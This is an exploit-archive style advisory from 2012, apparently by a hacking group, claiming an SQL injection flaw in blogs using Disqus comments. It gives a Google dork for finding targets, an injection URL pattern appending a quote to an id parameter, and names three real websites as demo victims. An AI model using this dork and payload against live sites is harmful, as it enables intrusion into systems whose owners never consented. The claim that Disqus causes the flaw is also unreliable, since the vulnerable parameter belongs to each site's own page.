:----------------------------------------------------------------------------------------------------------------------------------------: Blog Comments Powered By Disqus <- Sql Injection :----------------------------------------------------------------------------------------------------------------------------------------: :----------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title: Blog Comments Powered By Disqus : # Date: 28 August 2012 : # Author: Spy_w4r3 : # # Vendor or Software Link: http://disqus.com : # Category : Web Applications : # Google dork: inurl:/index.php?id= intext:"Powered by Disqus" : # Vulnerability : SQL Injection Vulnerability : # Tested On : Mozilla Firefox 14.0.1 (Windows) : # Greetz to : Indonesian BlackHat Team, dr.spyc0d3r, syafm0vic007, budi_spielberg, zee.eichel, Xsan Lahci, ono_efeyu, wahyu_ade10, And Thia :----------------------------------------------------------------------------------------------------------------------------------------: # DORKS :----------------------------------------------------------------------------------------------------------------------------------------: inurl:/index.php?id= intext:"Powered by Disqus" # Proof of Concept :----------------------------------------------------------------------------------------------------------------------------------------: SQL Injection : http://victim site/<path>/index.php?id=['SQL] # Demo site: :----------------------------------------------------------------------------------------------------------------------------------------: http://fourtales.com/index.php?id=116' http://blasternation.com/index.php?id=131' http://www.gogetaroomie.com/index.php?id=298' # Credits :----------------------------------------------------------------------------------------------------------------------------------------: http://indonesianblackhat.web.id | http://indonesianblackhat.web.idБрой прочитания на тази страница: 1077
Disqus Blog Comments Blind SQL Injection Vulnerability